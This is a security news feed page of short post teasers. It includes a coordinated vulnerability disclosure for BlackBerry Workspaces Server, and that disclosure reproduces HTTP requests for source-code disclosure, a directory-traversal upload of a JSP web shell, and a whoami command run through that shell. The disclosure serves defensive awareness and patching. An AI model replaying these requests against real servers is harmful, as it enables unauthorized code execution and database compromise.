Collaborate Disseminate
Over the course of 2017, the cyberthreat landscape shifted to accommodate a sharper focus on pure data destruction for the sake of disruption rather than monetary gain.
The post Year in Review: How Did the Cyberthreat Landscape Change in 2017? appeared first on Security Intelligence.
Continue reading Year in Review: How Did the Cyberthreat Landscape Change in 2017?
While PwC’s “Global State of Information Security Survey” noted that governments have improved cyber resilience, businesses still have a long way to go.
The post What Can We Learn From the ‘Global State of Information Security Survey 2018’? appeared first on Security Intelligence.
Continue reading What Can We Learn From the ‘Global State of Information Security Survey 2018’?
Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.
CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.
BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006
The following Workspaces Server components are known to be vulnerable:
GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.
The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).
GET /fileserver/main.js HTTP/1.1 Host: [REMOVED BY GDS]
HTTP/1.1 200 OK [..snip..]
By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).
POST /fileserver/saveDocument HTTP/1.1 [..snip..] Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159 Content-Length: 1286 -----------------------------1484231460308104668732082159 Content-Disposition: form-data; name="uuid" /../../mnt/filespace/0/whiteLabel/ -----------------------------1484231460308104668732082159 Content-Disposition: form-data; name="fileName" shell.jsp -----------------------------1484231460308104668732082159 Content-Disposition: form-data; name="store" local -----------------------------1484231460308104668732082159 Content-Disposition: form-data; name="uploadFile"; filename="test" [..snip..] -----------------------------1484231460308104668732082159--
HTTP/1.1 200 OK
[..snip..]
{"success":"true"}
GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1 [..snip..]
HTTP/1.1 200 OK [..snip..] <pre>Command was: <b>whoami</b> watchdox </pre>
CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).
CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.
GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:
The post Remote Code Execution in BlackBerry Workspaces Server appeared first on Security Boulevard.
Continue reading Remote Code Execution in BlackBerry Workspaces Server
While it promises to improve quality of life across the globe, many are resistant to widespread cognitive adoption due to fear of change and other factors.
The post Weighing the Benefits and Challenges of Cognitive Adoption appeared first on Security Intelligence.
Continue reading Weighing the Benefits and Challenges of Cognitive Adoption
According to recent studies, security is the top concern among organizations implementing software-defined wide area network (SD-WAN) technology.
The post Getting Ahead of SD-WAN Security With the Zero Trust Model appeared first on Security Intelligence.
Continue reading Getting Ahead of SD-WAN Security With the Zero Trust Model
To improve infrastructure security per the president’s executive order, government agencies must build trust with the private security industry.
The post Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security appeared first on Security Intelligence.
Cybercrime affects businesses and government agencies equally, so why shouldn’t the public and private sectors collaborate to secure their critical assets?
The post Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future appeared first on Security Intelligence.
Cloud security must be a team effort between providers and customers. The distribution of responsibility depends on the cloud model.
The post Who Is Responsible for Cloud Security? appeared first on Security Intelligence.
The IoT is transforming before our eyes due to increasing regulations, growing demand for security standards and advancements in the telecom industry.
The post Big Changes Around the Corner for the IoT appeared first on Security Intelligence.
A hot desking strategy allows employees to sit wherever they want, creating more flexibility for workers and more complexity for IT managers.
The post How to Ensure the Success of a Hot Desking Strategy appeared first on Security Intelligence.
Continue reading How to Ensure the Success of a Hot Desking Strategy